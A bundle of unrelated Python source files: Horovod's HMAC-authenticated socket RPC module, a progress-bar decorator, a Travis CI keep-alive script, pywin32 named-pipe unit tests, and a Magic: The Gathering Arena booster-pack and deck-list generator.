| source | python |
|---|---|
network.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
from horovod.run.util.network import find_port
class PingRequest(object):
pass
class NoValidAddressesFound(Exception):
pass
class PingResponse(object):
def __init__(self, service_name, source_address):
self.service_name = service_name
"""Service name that responded to this ping."""
self.source_address = source_address
"""Source IP address that was visible to the service."""
class AckResponse(object):
"""Used for situations when the response does not carry any data."""
pass
class Wire(object):
"""
Used for serialization/deserialization of objects over the wire.
We use HMAC to protect services from unauthorized use. The key used for
the HMAC digest is distributed by Open MPI and Spark.
The objects are serialized using cloudpickle. Serialized objects become
the body of the message.
Structure of the message is as follows:
- HMAC digest of the body (32 bytes)
- length of the body (4 bytes)
- body
"""
def __init__(self, key):
self._key = key
def write(self, obj, wfile):
message = cloudpickle.dumps(obj)
digest = secret.compute_digest(self._key, message)
wfile.write(digest)
# Pack message length into 4-byte integer.
wfile.write(struct.pack('i', len(message)))
wfile.write(message)
wfile.flush()
def read(self, rfile):
digest = rfile.read(secret.DIGEST_LENGTH)
# Unpack message length from 4-byte integer.
message_len = struct.unpack('i', rfile.read(4))[0]
message = rfile.read(message_len)
if not secret.check_digest(self._key, message, digest):
raise Exception('Security error: digest did not match the message.')
return cloudpickle.loads(message)
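# --- Illustrative sketch (not part of the original module) ------------------
# A minimal round trip through Wire over an in-memory buffer, assuming that
# horovod.run.common.util.secret exposes make_secret_key() as in Horovod's
# runner utilities:
#
#     import io
#     key = secret.make_secret_key()
#     wire = Wire(key)
#     buf = io.BytesIO()
#     wire.write({'hello': 'world'}, buf)
#     buf.seek(0)
#     assert wire.read(buf) == {'hello': 'world'}
# -----------------------------------------------------------------------------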
class BasicService(object):
def __init__(self, service_name, key, nic):
self._service_name = service_name
self._wire = Wire(key)
self._nic = nic
self._server, _ = find_port(
lambda addr: socketserver.ThreadingTCPServer(
addr, self._make_handler()),
pedl_provisioned_port=0,
verbose=False,
)
self._port = self._server.socket.getsockname()[1]
self._addresses = self._get_local_addresses()
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
def _make_handler(self):
server = self
class _Handler(socketserver.StreamRequestHandler):
def handle(self):
try:
req = server._wire.read(self.rfile)
resp = server._handle(req, self.client_address)
if not resp:
raise Exception('Handler did not return a response.')
server._wire.write(resp, self.wfile)
except EOFError:
# Happens when client is abruptly terminated, don't want to pollute the logs.
pass
return _Handler
def _handle(self, req, client_address):
if isinstance(req, PingRequest):
return PingResponse(self._service_name, client_address[0])
raise NotImplementedError(req)
def _get_local_addresses(self):
result = {}
for intf, intf_addresses in psutil.net_if_addrs().items():
if self._nic and intf != self._nic:
continue
for addr in intf_addresses:
if addr.family == socket.AF_INET:
if intf not in result:
result[intf] = []
result[intf].append((addr.address, self._port))
if not result and self._nic:
raise NoValidAddressesFound(
'No available network interface found matching user provided interface: {}'.format(self._nic))
return result
def addresses(self):
return self._addresses
def shutdown(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def get_port(self):
return self._port
class BasicClient(object):
def __init__(self, service_name, addresses, key, verbose, match_intf=False,
probe_timeout=20, retries=3):
# Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
self._verbose = verbose
self._service_name = service_name
self._wire = Wire(key)
self._match_intf = match_intf
self._probe_timeout = probe_timeout
self._retries = retries
self._addresses = self._probe(addresses)
if not self._addresses:
raise NoValidAddressesFound(
'Horovodrun was unable to connect to {service_name} on any '
'of the following addresses: {addresses}.\n\n'
'One possible cause of this problem is that '
'horovodrun currently requires every host to have at '
'least one routable network interface with the same '
'name across all of the hosts. '
'You can run \"ifconfig -a\" '
'on every host and check for the common '
'routable interface. '
'To fix the problem, you can rename interfaces on '
'Linux.'.format(service_name=service_name, addresses=addresses))
def _probe(self, addresses):
result_queue = queue.Queue()
threads = []
for intf, intf_addresses in addresses.items():
for addr in intf_addresses:
thread = threading.Thread(target=self._probe_one,
args=(intf, addr, result_queue))
thread.daemon = True
thread.start()
threads.append(thread)
for t in threads:
t.join()
result = {}
while not result_queue.empty():
intf, addr = result_queue.get()
if intf not in result:
result[intf] = []
result[intf].append(addr)
return result
def _probe_one(self, intf, addr, result_queue):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self._probe_timeout)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(PingRequest(), wfile)
resp = self._wire.read(rfile)
if resp.service_name != self._service_name:
return
if self._match_intf:
# Interface name of destination and source must match
# since `match_intf` is requested.
client_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(intf, [])
if x.family == socket.AF_INET]
if resp.source_address not in client_intf_addrs:
if self._verbose >= 2:
# Need to find the local interface name whose
# address was visible to the target host's server.
resp_intf = ''
for key in psutil.net_if_addrs().keys():
key_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(key, [])]
if resp.source_address in key_intf_addrs:
resp_intf = key
break
print('WARNING: Expected to connect the host '
'{addr} using interface '
'{intf}, but reached it on interface '
'{resp_intf}.'.format(
addr=str(addr[0])+':'+str(addr[1]),
intf=intf,
resp_intf=resp_intf))
return
result_queue.put((intf, addr))
return
finally:
rfile.close()
wfile.close()
except:
pass
finally:
sock.close()
def _send_one(self, addr, req):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(req, wfile)
resp = self._wire.read(rfile)
return resp
finally:
rfile.close()
wfile.close()
except:
if iter == self._retries - 1:
# Raise exception on the last retry.
raise
finally:
sock.close()
def _send(self, req):
# Since all the addresses were vetted, use the first one.
addr = list(self._addresses.values())[0][0]
return self._send_one(addr, req)
def addresses(self):
return self._addresses
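# --- Usage sketch (not part of the original module) --------------------------
# How BasicService and BasicClient are typically wired together, assuming
# secret.make_secret_key() is available as in Horovod's runner utilities.
# BasicClient probes every advertised (interface, address) pair with a
# PingRequest and keeps only the addresses that answered with the expected
# service name:
#
#     key = secret.make_secret_key()
#     service = BasicService('demo service', key, nic=None)
#     client = BasicClient('demo service', service.addresses(), key, verbose=0)
#     print(client.addresses())   # reachable addresses, grouped by interface
#     service.shutdown()
# -----------------------------------------------------------------------------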
|
progressbar.py
|
# -*- coding: utf-8 -*-
import sys
import time
import threading
from functools import wraps
def progressbar(function=None, char='.', pause=0.2, bar_len=60):
"""
This function is a decorator that displays a progress bar.
Use it as follows:
.. python code:
@progressbar
def any_function():
... do something ...
any_function()
..
"""
if function is None:
return lambda func: progressbar(func, char, pause, bar_len)
@wraps(function)
def wrapped_function(*args, **kwargs):
stop = False
def progress_bar():
while not stop:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(pause)
sys.stdout.write('\n Done. \n')
sys.stdout.flush()
try:
p = threading.Thread(target=progress_bar)
p.start()
return function(*args, **kwargs)
finally:
stop = True
return wrapped_function
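# Usage sketch: calling the decorator with arguments exercises the
# "function is None" branch above (the function name below is illustrative).
#
#     @progressbar(char='#', pause=0.5)
#     def long_task():
#         time.sleep(3)
#
#     long_task()   # prints '#' every 0.5s until long_task returns, then "Done."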
|
travis_run.py
|
#!/usr/bin/env python
import sys
import time
import threading
import subprocess
# This script executes a long-running command while periodically printing "still running ..."
# to notify the Travis build system that the program has not hung.
PING_INTERVAL=15
def monitor(stop):
wait_time = 0
while True:
time.sleep(PING_INTERVAL)
wait_time += PING_INTERVAL
print(" + still running (" + str(wait_time) + "s) ...")
sys.stdout.flush()
if stop():
break
def execute(command):
# Text mode so readline() returns str and the '' sentinel comparison works on Python 3.
process = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True)
while True:
output = process.stdout.readline()
if output == '' and process.poll() is not None:
break
if output:
print(output.strip())
sys.stdout.flush()
return process.returncode
def main(argv):
# start monitoring thread
stop_monitor = False
t = threading.Thread(target=monitor, args=(lambda: stop_monitor,))
t.start()
# execute command
exitcode = execute(argv)
print(" + exitcode="+str(exitcode))
sys.stdout.flush()
# terminate monitoring thread
stop_monitor = True
t.join()
sys.exit(exitcode)
if __name__ == "__main__":
main(sys.argv[1:])
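# Invocation sketch (the command shown is purely an example):
#
#     python travis_run.py make test
#
# runs `make test`, echoes its output line by line, and prints a
# "still running (Ns) ..." heartbeat every PING_INTERVAL seconds so that
# Travis does not abort the build for lack of output.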
|
test_win32pipe.py
|
import unittest
import time
import threading
from pywin32_testutil import str2bytes # py3k-friendly helper
import win32pipe
import win32file
import win32event
import pywintypes
import winerror
import win32con
class PipeTests(unittest.TestCase):
pipename = "\\\\.\\pipe\\python_test_pipe"
def _serverThread(self, pipe_handle, event, wait_time):
# just do one connection and terminate.
hr = win32pipe.ConnectNamedPipe(pipe_handle)
self.failUnless(hr in (0, winerror.ERROR_PIPE_CONNECTED), "Got error code 0x%x" % (hr,))
hr, got = win32file.ReadFile(pipe_handle, 100)
self.failUnlessEqual(got, str2bytes("foo\0bar"))
time.sleep(wait_time)
win32file.WriteFile(pipe_handle, str2bytes("bar\0foo"))
pipe_handle.Close()
event.set()
def startPipeServer(self, event, wait_time = 0):
openMode = win32pipe.PIPE_ACCESS_DUPLEX
pipeMode = win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT
sa = pywintypes.SECURITY_ATTRIBUTES()
sa.SetSecurityDescriptorDacl ( 1, None, 0 )
pipe_handle = win32pipe.CreateNamedPipe(self.pipename,
openMode,
pipeMode,
win32pipe.PIPE_UNLIMITED_INSTANCES,
0,
0,
2000,
sa)
threading.Thread(target=self._serverThread, args=(pipe_handle, event, wait_time)).start()
def testCallNamedPipe(self):
event = threading.Event()
self.startPipeServer(event)
got = win32pipe.CallNamedPipe(self.pipename,str2bytes("foo\0bar"), 1024, win32pipe.NMPWAIT_WAIT_FOREVER)
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
def testTransactNamedPipeBlocking(self):
event = threading.Event()
self.startPipeServer(event)
open_mode = win32con.GENERIC_READ | win32con.GENERIC_WRITE
hpipe = win32file.CreateFile(self.pipename,
open_mode,
0, # no sharing
None, # default security
win32con.OPEN_EXISTING,
0, # win32con.FILE_FLAG_OVERLAPPED,
None)
# set to message mode.
win32pipe.SetNamedPipeHandleState(
hpipe, win32pipe.PIPE_READMODE_MESSAGE, None, None)
hr, got = win32pipe.TransactNamedPipe(hpipe, str2bytes("foo\0bar"), 1024, None)
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
def testTransactNamedPipeBlockingBuffer(self):
# Like testTransactNamedPipeBlocking, but a pre-allocated buffer is
# passed (not really that useful, but it exercises the code path)
event = threading.Event()
self.startPipeServer(event)
open_mode = win32con.GENERIC_READ | win32con.GENERIC_WRITE
hpipe = win32file.CreateFile(self.pipename,
open_mode,
0, # no sharing
None, # default security
win32con.OPEN_EXISTING,
0, # win32con.FILE_FLAG_OVERLAPPED,
None)
# set to message mode.
win32pipe.SetNamedPipeHandleState(
hpipe, win32pipe.PIPE_READMODE_MESSAGE, None, None)
buffer = win32file.AllocateReadBuffer(1024)
hr, got = win32pipe.TransactNamedPipe(hpipe, str2bytes("foo\0bar"), buffer, None)
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
def testTransactNamedPipeAsync(self):
event = threading.Event()
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
self.startPipeServer(event, 0.5)
open_mode = win32con.GENERIC_READ | win32con.GENERIC_WRITE
hpipe = win32file.CreateFile(self.pipename,
open_mode,
0, # no sharing
None, # default security
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_OVERLAPPED,
None)
# set to message mode.
win32pipe.SetNamedPipeHandleState(
hpipe, win32pipe.PIPE_READMODE_MESSAGE, None, None)
buffer = win32file.AllocateReadBuffer(1024)
hr, got = win32pipe.TransactNamedPipe(hpipe, str2bytes("foo\0bar"), buffer, overlapped)
self.failUnlessEqual(hr, winerror.ERROR_IO_PENDING)
nbytes = win32file.GetOverlappedResult(hpipe, overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
if __name__ == '__main__':
unittest.main()
|
generator.py
|
import calendar
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from dateutil.tz import gettz
from hashlib import sha512
from operator import attrgetter
from os.path import exists, join
from re import sub
from threading import Thread
from PIL import Image, ImageDraw, ImageFont
import random
import re
from mtga.set_data import all_mtga_cards
from card_image_downloader import CardImageDownloader
from io import BytesIO
class Rarity():
TOKEN = "Token"
BASIC = "Basic"
COMMON = "Common"
UNCOMMON = "Uncommon"
RARE = "Rare"
MYTHIC_RARE = "Mythic Rare"
class N_IN_PACK():
BASIC = 1
COMMON = 10
UNCOMMON = 3
RARE = 1
class Mode():
MONTHLY = "monthly"
WEEKLY = "weekly"
DAILY = "daily"
RANDOM = "random"
STATIC = "static"
class Key():
DECK = "deck"
SIDEBOARD = "sideboard"
CREATURE = "creature"
NONCREATURE = "noncreature"
LAND = "land"
BASIC = "basic"
NONBASIC = "nonbasic"
MV_1 = "-1"
MV_2 = "2"
MV_3 = "3"
MV_4 = "4"
MV_5 = "5"
MV_6 = "6-"
class CardImage():
WIDTH = 265
HEIGHT = 370
HEIGHT_MARGIN = 74
COLUMN_MARGIN = 20
ROW_MARGIN = 10
class Generator():
TZ_UTC = gettz("UTC")
MONTHLY_RESET_HOUR = 20
WEEKLY_RESET_HOUR = 8
DAILY_RESET_HOUR = 8
MYTHIC_RARE_RATE = 1 / 7.4
BASIC_LANDS = ["平地", "島", "沼", "山", "森", "Plains", "Island", "Swamp", "Mountain", "Forest"]
ALCHEMY_PREFIX = "A-"
def __init__(self, pool=all_mtga_cards, card_image_cache_dir='.'):
self.downloader = CardImageDownloader(language='Japanese', json_dir='set_data')
self.cards = pool.cards
self.sets = self.get_sets()
self.set_info = {}
for set in self.sets:
self.set_info[set] = {}
cards = self.get_cards(set=set, rarity=Rarity.MYTHIC_RARE)
self.set_info[set][Rarity.MYTHIC_RARE] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.RARE)
self.set_info[set][Rarity.RARE] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.UNCOMMON)
self.set_info[set][Rarity.UNCOMMON] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.COMMON)
self.set_info[set][Rarity.COMMON] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.BASIC)
self.set_info[set][Rarity.BASIC] = len(cards)
self.card_image_cache_dir = card_image_cache_dir
def add_card(self, set, rarity, picked_cards):
cards = self.get_cards(set=set, rarity=rarity)
while True:
card = cards[random.randrange(0, len(cards))]
if card not in picked_cards:
picked_cards.append(card)
return picked_cards
def open_boosters(self, user_id, sets, pack_nums, mode=None, index_dt=None):
pool = []
for i in range(len(sets)):
if sets[i] and pack_nums[i]:
# Initialize the random seed
random.seed(self.get_seed(user_id, sets[i], mode, index_dt))
# Open the booster packs
cards = []
for _ in range(pack_nums[i]):
cards += self.open_booster(sets[i])
cards = self.sort_cards_by_set_number(cards)
pool += cards
return pool
def open_booster(self, set):
if set and not self.sealedable(set):
return None
cards = []
# Rare / Mythic Rare slot
if set and self.set_info[set][Rarity.MYTHIC_RARE] == 0:
for _ in range(N_IN_PACK.RARE):
cards = self.add_card(
set=set,
rarity=Rarity.RARE,
picked_cards=cards
)
else:
for _ in range(N_IN_PACK.RARE):
cards = self.add_card(
set=set,
rarity=Rarity.MYTHIC_RARE if random.random() < self.MYTHIC_RARE_RATE else Rarity.RARE,
picked_cards=cards
)
# Uncommon slots
for _ in range(N_IN_PACK.UNCOMMON):
cards = self.add_card(set=set, rarity=Rarity.UNCOMMON, picked_cards=cards)
# Common slots
for _ in range(N_IN_PACK.COMMON):
cards = self.add_card(set=set, rarity=Rarity.COMMON, picked_cards=cards)
# Basic land slot
if set and self.set_info[set][Rarity.BASIC] > 0:
for _ in range(N_IN_PACK.BASIC):
cards = self.add_card(set=set, rarity=Rarity.BASIC, picked_cards=cards)
return cards
def get_cards(self, name="", pretty_name="", cost=None, color_identity=None, card_type="", sub_type="", super_type="",
ability="", set="", rarity="", collectible=True, set_number=0, mtga_id=0,
is_token=False, is_secondary_card=False, is_rebalanced=False):
cards = []
for card in self.cards:
if name and card.name != name:
continue
if pretty_name and card.pretty_name != pretty_name:
continue
if cost and card.cost != cost:
continue
if color_identity and card.color_identity != color_identity:
continue
if card_type and card.card_type != card_type:
continue
if sub_type and not sub_type in card.sub_types:
continue
if super_type and not super_type in card.super_type:
continue
if ability and not ability in card.abilities:
continue
if set and card.set != set:
continue
if rarity and card.rarity != rarity:
continue
if card.collectible != collectible:
continue
if set_number and card.set_number != set_number:
continue
if mtga_id and card.mtga_id != mtga_id:
continue
if card.is_token != is_token:
continue
if card.is_secondary_card != is_secondary_card:
continue
if card.is_rebalanced != is_rebalanced:
continue
cards.append(card)
return cards
def get_sets(self):
sets = []
for card in self.get_cards():
if card.set and card.set not in sets:
sets.append(card.set)
return sets
def validate_decklist(self, decklist, pool):
decklist_pool = self.cards_to_decklist_cards(pool, True)
decklist_deck = self.decklist_to_decklist_cards(decklist, True)
invalid_cards = {}
for deck_key in decklist_deck:
if deck_key in self.BASIC_LANDS:
continue
elif deck_key in decklist_pool.keys():
num_diff = int(decklist_pool[deck_key]) - int(decklist_deck[deck_key])
if num_diff < 0:
invalid_cards[deck_key] = abs(num_diff)
else:
invalid_cards[deck_key] = decklist_deck[deck_key]
return invalid_cards
def sealedable(self, set):
if self.set_info[set][Rarity.RARE] < N_IN_PACK.RARE:
return False
if self.set_info[set][Rarity.UNCOMMON] < N_IN_PACK.UNCOMMON:
return False
if self.set_info[set][Rarity.COMMON] < N_IN_PACK.COMMON:
return False
return True
def decklist_cards_to_cards(self, decklist_cards, name_only=False):
rst = []
for key in decklist_cards.keys():
n = decklist_cards[key]
if name_only:
name = key
set = ""
set_number = 0
else:
name = " ".join(key.split()[0:-2])
set = key.split()[-2].strip("()")
set_number = int(key.split()[-1])
if name.startswith(self.ALCHEMY_PREFIX):
pretty_name = sub("^"+self.ALCHEMY_PREFIX, "", name)
is_rebalanced = True
else:
pretty_name = name
is_rebalanced = False
cards = self.get_cards(pretty_name=pretty_name, set=set, set_number=set_number, is_rebalanced=is_rebalanced)
if cards:
for _ in range(n):
rst.append(cards[-1])
return rst
def strip_invalid_cards_from_decklist(self, decklist, invalid_cards):
deck, sideboard = self.separate_decklist_to_deck_and_sideboard(decklist)
deck_cards = self.decklist_to_decklist_cards(deck)
sideboard_cards = self.decklist_to_decklist_cards(sideboard)
sideboard_cards, invalid_cards = self.strip_invalid_cards_from_decklist_cards(sideboard_cards, invalid_cards)
if invalid_cards:
deck_cards, invalid_cards = self.strip_invalid_cards_from_decklist_cards(deck_cards, invalid_cards)
deck = self.decklist_cards_to_decklist(deck_cards)
sideboard = self.decklist_cards_to_decklist(sideboard_cards, is_sideboard=True)
return deck + "\n" + sideboard
def strip_invalid_cards_from_decklist_cards(self, decklist_cards, invalid_cards):
for invalid_card in invalid_cards.keys(): # invalid_card: card name
for decklist_card in decklist_cards.keys(): # decklist_card: "card name (set code) set number"
if decklist_card.startswith(invalid_card+" "):
if decklist_cards[decklist_card] > invalid_cards[invalid_card]:
decklist_cards[decklist_card] -= invalid_cards[invalid_card]
invalid_cards[invalid_card] = 0
break
elif decklist_cards[decklist_card] == invalid_cards[invalid_card]:
decklist_cards[decklist_card] = 0
invalid_cards[invalid_card] = 0
break
elif decklist_cards[decklist_card] < invalid_cards[invalid_card]:
invalid_cards[invalid_card] -= decklist_cards[decklist_card]
decklist_cards[decklist_card] = 0
for key in [k for k in decklist_cards.keys() if decklist_cards[k] == 0]:
del decklist_cards[key]
for key in [k for k in invalid_cards.keys() if invalid_cards[k] == 0]:
del invalid_cards[key]
return decklist_cards, invalid_cards
def get_diff_cards(self, pool, decklist):
pool_cards = self.cards_to_decklist_cards(pool)
decklist_cards = self.decklist_to_decklist_cards(decklist, name_only=True)
diff_cards, _ = self.strip_invalid_cards_from_decklist_cards(pool_cards, decklist_cards)
return diff_cards
def add_diff_to_sideboard(self, decklist, pool):
adding_cards = self.get_diff_cards(pool, decklist)
adding_str = self.decklist_cards_to_decklist(adding_cards, is_sideboard=True)
if "サイドボード\n" in decklist or "Sideboard\n" in decklist:
adding_str = adding_str.replace("サイドボード\n", "").replace("Sideboard\n", "")
else:
adding_str = "\n"+adding_str
return decklist + adding_str
@classmethod
def decklist_to_decklist_cards(cls, decklist, name_only=False):
decklist_cards = {}
decklist_lines = decklist.splitlines()
for line in decklist_lines:
if re.match(r'^[1-9]', line):
num = int(line.split()[0])
if name_only:
decklist_card_str = " ".join(line.split()[1:-2])
else:
decklist_card_str = " ".join(line.split()[1:])
if decklist_cards.get(decklist_card_str): # the same card may be split across deck and sideboard
decklist_cards[decklist_card_str] += num
else:
decklist_cards[decklist_card_str] = num
return decklist_cards
@classmethod
def parse_decklist(cls, decklist): # rst[card name] = [set code, collector number]
rst = {}
decklist_lines = decklist.splitlines()
for line in decklist_lines:
if re.match(r'^[1-9]', line):
splited_line = line.split()
name = " ".join(splited_line[1:-2])
if name not in rst.keys():
set = splited_line[-2].strip("()")
number = int(splited_line[-1])
rst[name] = [set, number]
return rst
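# Illustrative sketch (not part of the original class): the MTG Arena export
# format that parse_decklist expects, with made-up card lines. Only the first
# (set, collector number) seen per card name is kept:
#
#     sample = "デッキ\n4 Llanowar Elves (M19) 314\n2 Shock (M19) 156\nサイドボード\n1 Shock (M19) 156"
#     Generator.parse_decklist(sample)
#     # -> {'Llanowar Elves': ['M19', 314], 'Shock': ['M19', 156]}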
def download_decklist_card_image(self, decklist):
# Parse the decklist
parsed_decklist = self.parse_decklist(decklist)
# Collect the list of sets from the parsed decklist
sets = []
for key in parsed_decklist.keys():
set = parsed_decklist[key][0]
if set not in sets:
sets.append(set)
# Download card images for each set in parallel
print("カード画像の取得を開始")
threads = []
for set in sets:
threads.append(Thread(target=self.download_set_card_image_from_parsed_decklist, args=(parsed_decklist, set)))
threads[-1].start()
for thread in threads:
thread.join()
print("カード画像の取得が完了")
def download_set_card_image_from_parsed_decklist(self, parsed_decklist, set):
# Fetch the card list for this set
self.downloader.get_set_cards(set)
# For each card in the parsed decklist belonging to this set, download its image in parallel
threads = []
for key in parsed_decklist.keys():
if parsed_decklist[key][0] == set:
name = key
number = parsed_decklist[key][1]
if name.startswith(self.ALCHEMY_PREFIX): # handle Alchemy (rebalanced) cards
#name = sub("^"+self.ALCHEMY_PREFIX, "", name, 1)
number = self.ALCHEMY_PREFIX+str(number)
threads.append(Thread(target=self.get_card_image_path, args=(name, set, number)))
threads[-1].start()
for thread in threads:
thread.join()
@classmethod
def get_pack_num(cls, mode):
# Decide how many packs to open based on the number of weeks since the start of the month
if mode == Mode.MONTHLY:
td = datetime.now(tz=cls.TZ_UTC) - cls.get_index_datetime(mode)
if td.days < 7:
pack_num = 4
elif td.days < 14:
pack_num = 6
elif td.days < 21:
pack_num = 9
else:
pack_num = 12
else:
pack_num = 6
return pack_num
@classmethod
def get_index_datetime(cls, mode, index_dt=None):
now = datetime.now(cls.TZ_UTC)
if mode == Mode.MONTHLY:
if (now+timedelta(days=1)).day == 1 and now.hour >= cls.MONTHLY_RESET_HOUR: # tomorrow is the 1st, i.e. today is the last day of the month
dt = datetime(now.year, now.month, now.day, cls.MONTHLY_RESET_HOUR, tzinfo=cls.TZ_UTC)
else:
dt = datetime(now.year, now.month - 1, calendar.monthrange(now.year, now.month - 1)[1], cls.MONTHLY_RESET_HOUR, tzinfo=cls.TZ_UTC) # last day of the previous month
elif mode == Mode.WEEKLY:
if now.weekday() == 6 and now.hour > cls.WEEKLY_RESET_HOUR: # today is Sunday
dt = datetime(now.year, now.month, now.day, cls.WEEKLY_RESET_HOUR, tzinfo=cls.TZ_UTC)
else:
dt = datetime(now.year, now.month, now.day, cls.WEEKLY_RESET_HOUR, tzinfo=cls.TZ_UTC) - timedelta(days=now.weekday()+1)
elif mode == Mode.DAILY:
if now.hour > cls.DAILY_RESET_HOUR:
dt = datetime(now.year, now.month, now.day, cls.DAILY_RESET_HOUR, tzinfo=cls.TZ_UTC)
else:
dt = datetime(now.year, now.month, now.day, cls.DAILY_RESET_HOUR, tzinfo=cls.TZ_UTC) - timedelta(days=1)
elif mode == Mode.STATIC and index_dt:
dt = index_dt
else:
dt = now
return dt
@classmethod
def get_next_index_datetime(cls, mode):
index_dt = cls.get_index_datetime(mode)
if mode == Mode.MONTHLY:
dt = index_dt + relativedelta(months=1)
elif mode == Mode.WEEKLY:
dt = index_dt + timedelta(days=7)
elif mode == Mode.DAILY:
dt = index_dt + timedelta(days=1)
elif mode == Mode.RANDOM:
dt = index_dt
elif mode == Mode.STATIC:
dt = None
else:
dt = None
return dt
@classmethod
def get_seed(cls, user_id, set, mode, index_dt=None):
return cls.get_hashed_int(
user_id=user_id,
set=set,
timestamp=cls.get_index_datetime(mode, index_dt).timestamp()
)
@classmethod
def get_hashed_int(cls, user_id, set, timestamp):
hash_str = user_id + "@" + set + "@" + str(timestamp)
hash_bytes = hash_str.encode(encoding="utf-8")
hashed_bytes = sha512(hash_bytes)
hashed_int = int(hashed_bytes.hexdigest(), 16)
return hashed_int
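# Note (illustrative, not part of the original class): the seed is simply the
# SHA-512 digest of "user_id@set@timestamp" interpreted as an integer, so the
# same user, set and reset period always reproduce the same booster contents:
#
#     Generator.get_hashed_int("alice", "M19", 1564617600.0) == \
#         Generator.get_hashed_int("alice", "M19", 1564617600.0)   # True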
@classmethod
def cards_to_decklist(cls, cards):
decklist_cards = cls.cards_to_decklist_cards(cards)
decklist = cls.decklist_cards_to_decklist(decklist_cards)
return decklist
@classmethod
def cards_to_decklist_cards(cls, cards, name_only=False):
decklist_cards = {}
for card in cards:
pretty_name = cls.ALCHEMY_PREFIX+card.pretty_name if card.is_rebalanced else card.pretty_name
if name_only:
decklist_card_str = pretty_name
else:
decklist_card_str = pretty_name + " (" + card.set + ") " + str(card.set_number)
if decklist_card_str not in decklist_cards:
decklist_cards[decklist_card_str] = 1
else:
decklist_cards[decklist_card_str] += 1
return decklist_cards
@classmethod
def decklist_cards_to_decklist(cls, decklist_cards, name_only=False, is_sideboard=False):
decklist = ("デッキ" if not is_sideboard else "サイドボード")+"\n"
for key in decklist_cards.keys():
if decklist_cards[key] == 0:
continue
if name_only:
decklist += str(decklist_cards[key]) + " " + " ".join(key.split()[0:-2]) + "\n"
else:
decklist += str(decklist_cards[key]) + " " + key + "\n"
return decklist
@classmethod
def sort_cards_by_set_number(cls, cards):
set_numbers = []
results = []
for card in cards:
set_numbers.append(card.set_number)
set_numbers.sort()
for set_number in set_numbers:
for card in cards:
if card.set_number == set_number:
results.append(card)
break
return results
@classmethod
def separate_decklist_to_deck_and_sideboard(cls, decklist):
is_deck = True
deck = "デッキ\n"
sideboard = "サイドボード\n"
decklist_lines = decklist.splitlines()
for line in decklist_lines:
if line in ["サイドボード", "Sideboard"]:
is_deck = False
elif re.match(r'^[0-9]', line):
if is_deck:
deck += line + "\n"
else:
sideboard += line + "\n"
return deck, sideboard
@classmethod
def cards_to_decklist_image_array(cls, cards):
rst = {
Key.CREATURE: {
Key.MV_1: [],
Key.MV_2: [],
Key.MV_3: [],
Key.MV_4: [],
Key.MV_5: [],
Key.MV_6: []
},
Key.NONCREATURE: {
Key.MV_1: [],
Key.MV_2: [],
Key.MV_3: [],
Key.MV_4: [],
Key.MV_5: [],
Key.MV_6: []
},
Key.LAND: {
Key.BASIC: [],
Key.NONBASIC: []
}
}
for card in cards:
if card.is_creature_card:
key1 = Key.CREATURE
elif card.is_noncreature_spell_card:
key1 = Key.NONCREATURE
elif card.is_land_card:
key1 = Key.LAND
if key1 != Key.LAND:
if card.cmc <= 1:
key2 = Key.MV_1
elif card.cmc == 2:
key2 = Key.MV_2
elif card.cmc == 3:
key2 = Key.MV_3
elif card.cmc == 4:
key2 = Key.MV_4
elif card.cmc == 5:
key2 = Key.MV_5
elif card.cmc >= 6:
key2 = Key.MV_6
else:
if card.pretty_name in cls.BASIC_LANDS:
key2 = Key.BASIC
else:
key2 = Key.NONBASIC
rst[key1][key2].append(card)
return rst
def decklist_to_decklist_image_array(self, decklist):
rst = {
Key.DECK: {},
Key.SIDEBOARD: {}
}
deck, sideboard = self.separate_decklist_to_deck_and_sideboard(decklist)
deck_cards = self.decklist_cards_to_cards(self.decklist_to_decklist_cards(deck))
sideboard_cards = self.decklist_cards_to_cards(self.decklist_to_decklist_cards(sideboard))
rst[Key.DECK] = self.cards_to_decklist_image_array(deck_cards)
rst[Key.SIDEBOARD] = self.cards_to_decklist_image_array(sideboard_cards)
for key0 in rst.keys(): # DECK, SIDEBOARD
for key1 in rst[key0].keys(): # CREATURE, NONCREATURE, LAND
for key2 in rst[key0][key1].keys(): # MV_n, BASIC, NONBASIC
rst[key0][key1][key2].sort(key=attrgetter('cmc', 'set_number', 'set'))
return rst
